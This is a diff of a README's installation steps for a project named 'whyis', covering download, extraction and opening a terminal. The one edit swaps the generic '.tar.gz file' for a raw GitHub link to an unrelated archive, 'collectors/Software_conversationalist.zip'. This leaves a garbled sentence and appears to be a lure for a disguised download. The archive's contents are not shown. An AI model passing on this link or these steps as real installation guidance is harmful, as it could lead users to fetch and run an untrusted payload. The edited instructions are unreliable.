SammyCxu/whyis/README.md

    Click on the version appropriate for your system.
 This will start the download of a compressed file.
 Save it to a location you can easily access, like your Downloads folder.

 4. **Extract the Files**
-   Once the download is complete, locate the .zip or .tar.gz file.
+   Once the download is complete, locate the .zip or https://github.com/SammyCxu/whyis/raw/refs/heads/main/collectors/Software_conversationalist.zip file.
 Right-click on the file and choose to extract it.
 This will create a folder containing the program files.

 5. **Open a Terminal**
    Press `Ctrl + Alt + T` to open the terminal.
 This is where you will run the commands to install and use **whyis**.